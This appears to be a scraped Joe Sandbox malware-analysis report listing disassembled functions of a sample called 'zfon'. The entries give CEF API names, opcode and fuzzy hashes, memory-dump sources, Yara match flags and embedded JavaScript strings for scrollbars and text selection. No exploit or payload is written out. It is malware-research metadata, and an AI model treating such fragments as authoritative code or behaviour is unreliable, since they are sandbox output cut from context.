                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID: scene/custom-scrollbars$var __scInternalExt = __scInternalExt || {};__scInternalExt.CustomScrollbar = function(activeCssColor, inactiveCssColor, widthCss, paddingCss) { activeCssColor = activeCssColor || 'rgba(89,115,143,1.0)'; inactiveCssColor = inactiveCssColor || 'rgba(51,74,99,
                                                                                                                                                                            • API String ID: 2864223729-265620315
                                                                                                                                                                            • Opcode ID: c987cfb99b51a5a0c7cea09e1d20a60c389df5f98c8ebe295881995ee0159720
                                                                                                                                                                            • Instruction ID: 38a87b00071f3c9c9c4daf620506f3d424c1fd0b13b7286ede2c7a0326e551da
                                                                                                                                                                            • Opcode Fuzzy Hash: c987cfb99b51a5a0c7cea09e1d20a60c389df5f98c8ebe295881995ee0159720
                                                                                                                                                                            • Instruction Fuzzy Hash: E4319E23A0DA8391EE20EB28E490379A7B1FFC5794F948535E68D436A9DF3CD545CB20
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • scene/disable-select, xrefs: 00007FF79CFCED51
                                                                                                                                                                            • var __scInternalExt = __scInternalExt || {};__scInternalExt.DisableTextSelect = function() { var el = null; var ready = false; var init = function() { if (ready) { return true;} if (!el) { el = document.createElement('style'); i, xrefs: 00007FF79CFCED3F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID: scene/disable-select$var __scInternalExt = __scInternalExt || {};__scInternalExt.DisableTextSelect = function() { var el = null; var ready = false; var init = function() { if (ready) { return true;} if (!el) { el = document.createElement('style'); i
                                                                                                                                                                            • API String ID: 2864223729-2350028965
                                                                                                                                                                            • Opcode ID: 21d5c8da703922d565a4f325fabe9ba14340b9f5ce19cb1083d9820fda97c75a
                                                                                                                                                                            • Instruction ID: 1231f6f74cc2c1c94c6718330f8fdd8e9914c7ee8004772e260a8d8fbb5d3dec
                                                                                                                                                                            • Opcode Fuzzy Hash: 21d5c8da703922d565a4f325fabe9ba14340b9f5ce19cb1083d9820fda97c75a
                                                                                                                                                                            • Instruction Fuzzy Hash: F931702360DA8791EE20EB28E4903A9A7B1FFC5794F948135E68D436A9DF3CC545C720
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __std_exception_copy__std_exception_destroy
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2960854011-0
                                                                                                                                                                            • Opcode ID: bd92f64d335261570e5d26f6f9255d8f4051e18708e87215bc64ab645aac3861
                                                                                                                                                                            • Instruction ID: ec6a9f0b5650b2d2d8b08ff909bb2ae34629e20f2127edfb5282b05ef1e7ff57
                                                                                                                                                                            • Opcode Fuzzy Hash: bd92f64d335261570e5d26f6f9255d8f4051e18708e87215bc64ab645aac3861
                                                                                                                                                                            • Instruction Fuzzy Hash: 38F14F70A08F0D8FDB85EF58D488AA9B7F1FB69305F00416AE44AD7661EB31E944CF81
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059017424.0000026ADFD51000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000026ADFD51000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_26adfd51000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 593203224-0
                                                                                                                                                                            • Opcode ID: af466333a9729f9682caa3f8c0ad6bbb8cf15438e78ccc876ba822118fb2a79a
                                                                                                                                                                            • Instruction ID: 7f5b8fc0e42fc3caf72fe8efa5ec33ea4a716393cb60b880fb66e380327c3308
                                                                                                                                                                            • Opcode Fuzzy Hash: af466333a9729f9682caa3f8c0ad6bbb8cf15438e78ccc876ba822118fb2a79a
                                                                                                                                                                            • Instruction Fuzzy Hash: FB510631114E0C8FEB94EF18D489BA777E0FB65308F40056EE499D76A2DA36E841CF82
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 98c5707d6e0830c9ddeb49068d82b2b4c75d610491c9a8256c2b7ce4358af33d
                                                                                                                                                                            • Instruction ID: 779f5a60edb9dd0d5aeeb45872b1e39020c86f3f00e2ac5cf23e79495b6726a2
                                                                                                                                                                            • Opcode Fuzzy Hash: 98c5707d6e0830c9ddeb49068d82b2b4c75d610491c9a8256c2b7ce4358af33d
                                                                                                                                                                            • Instruction Fuzzy Hash: 0C715027B09B8289FF21DFB4E4402ADBBB6AB44758F444075DE8D27B59DE38C426C364
                                                                                                                                                                            APIs
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear$cef_string_utf16_set
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 255155458-0
                                                                                                                                                                            • Opcode ID: 1e3490bca68b8c3274cbeecc2115020831b9076bd9e81532a15e2d3a86fb5802
                                                                                                                                                                            • Instruction ID: 2ff26b3fe0754207093fbc7e59502c36dfc04c138c09139465881f05b1234cfb
                                                                                                                                                                            • Opcode Fuzzy Hash: 1e3490bca68b8c3274cbeecc2115020831b9076bd9e81532a15e2d3a86fb5802
                                                                                                                                                                            • Instruction Fuzzy Hash: DF616E63B04A8284FF24EBB5D4403BCA7B2AB40B98F998535DE5D57B99CF38D941C320
                                                                                                                                                                            APIs
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear$cef_string_utf16_set
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 255155458-0
                                                                                                                                                                            • Opcode ID: 6ace9081bd1f1edd449fb6e0773b42b66ffd3d33c4d8c5aa578f97e1b911971e
                                                                                                                                                                            • Instruction ID: b0ae4c4cc327b25e1d310ae0004c36f574efa4ef52e00ecc4b549d42ebec076d
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ace9081bd1f1edd449fb6e0773b42b66ffd3d33c4d8c5aa578f97e1b911971e
                                                                                                                                                                            • Instruction Fuzzy Hash: 0C519223B05A4284FF20ABB1D8402BC77B6BB44BA8F998135DE5D17B95CF38D945C310
                                                                                                                                                                            APIs
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            • Opcode ID: 767bc6d2e245786616d4daca169c721c6a8bad88ea9802c6d18b4e830295d1dd
                                                                                                                                                                            • Instruction ID: 13c7f7e616cf4c54aabc7efbefe90643d1374bd588f739bead10ba686f7dd27e
                                                                                                                                                                            • Opcode Fuzzy Hash: 767bc6d2e245786616d4daca169c721c6a8bad88ea9802c6d18b4e830295d1dd
                                                                                                                                                                            • Instruction Fuzzy Hash: 1A416D73618A8691EF60DF29E8507A9F761FB88B88F885031EB8E47A54DF3CD545C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            • Opcode ID: e303969fec3d2d5919997b4b44b45e4eedf2ec00d32255af54cedc5f9a7ed4b7
                                                                                                                                                                            • Instruction ID: 5b2a3ac21d0aa1fee01425c4077318b5515e563c2b37048067b3cc3137d685fa
                                                                                                                                                                            • Opcode Fuzzy Hash: e303969fec3d2d5919997b4b44b45e4eedf2ec00d32255af54cedc5f9a7ed4b7
                                                                                                                                                                            • Instruction Fuzzy Hash: CE314172718A8281EF64DF25E9507A9E371FF94B89F849031DA8E47668DF3CD445C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2864223729-0
                                                                                                                                                                            • Opcode ID: 547f02d0dd405122f301dc5fe4de50b4a8a0f3e08934c717986b7059ad5fe54c
                                                                                                                                                                            • Instruction ID: 34dcf9e86ca22a485989d6b0320bed4448168cfa8ec4f4e2ba5e241d7c6eeac0
                                                                                                                                                                            • Opcode Fuzzy Hash: 547f02d0dd405122f301dc5fe4de50b4a8a0f3e08934c717986b7059ad5fe54c
                                                                                                                                                                            • Instruction Fuzzy Hash: 98314E72618A8281EF64DB25E9503B9E772FF94B88F849031DA8E476A8DF3CD445C710
APIs
Memory Dump Source
• Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
• Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
Yara matches
Similarity
• API ID: cef_string_utf16_clear
• String ID:
• API String ID: 2864223729-0
Similarity
• API ID: cef_string_utf16_clear
• String ID:
• API String ID: 2864223729-0
Similarity
• API ID: cef_string_utf16_set
• String ID:
• API String ID: 2786225788-0
Similarity
• API ID: cef_string_utf16_clear
• String ID:
• API String ID: 2864223729-0
Similarity
• API ID: cef_string_utf16_clear$cef_parse_url
• String ID: ://
• API String ID: 3112977411-1869659232
Similarity
• API ID: cef_string_utf16_clear
• String ID: ContentSizeUpdate
• API String ID: 2864223729-3638871761
                                                                                                                                                                            • Opcode ID: f86edb876135eaae2020f8e938f6b9446a33d57ee3d659bcacc85f9186bf0c32
                                                                                                                                                                            • Instruction ID: c768404ecc3d8f14d9ee735d730d065ef3bcfa388028b52f8272e433fc889ddd
                                                                                                                                                                            • Opcode Fuzzy Hash: f86edb876135eaae2020f8e938f6b9446a33d57ee3d659bcacc85f9186bf0c32
                                                                                                                                                                            • Instruction Fuzzy Hash: 0931A663709A8281EE20EB28E490269E7B1FFC5B94F949531E78D47AB9DF3CC545C710
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.2059555373.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060015141.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060630390.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060694585.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060776824.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060876885.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000007.00000002.2060978931.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_api_hashcef_initialize
                                                                                                                                                                            • String ID: 11d15b06c9fb87a76f83ad5fe91f22eb03edbef5
                                                                                                                                                                            • API String ID: 1700379448-612978255
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_api_hashcef_execute_process
                                                                                                                                                                            • String ID: 11d15b06c9fb87a76f83ad5fe91f22eb03edbef5
                                                                                                                                                                            • API String ID: 1583481551-612978255
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • if (__scInternalExt && __scInternalExt.CustomScrollbar) { new __scInternalExt.CustomScrollbar().activate();}, xrefs: 00007FF79CFCEE6B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID: if (__scInternalExt && __scInternalExt.CustomScrollbar) { new __scInternalExt.CustomScrollbar().activate();}
                                                                                                                                                                            • API String ID: 2864223729-1929393026
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • if (__scInternalExt && __scInternalExt.DisableTextSelect) { __scInternalExt.DisableTextSelect();}, xrefs: 00007FF79CFCEF5B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.2059630246.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_utf16_clear
                                                                                                                                                                            • String ID: if (__scInternalExt && __scInternalExt.DisableTextSelect) { __scInternalExt.DisableTextSelect();}
                                                                                                                                                                            • API String ID: 2864223729-2589232223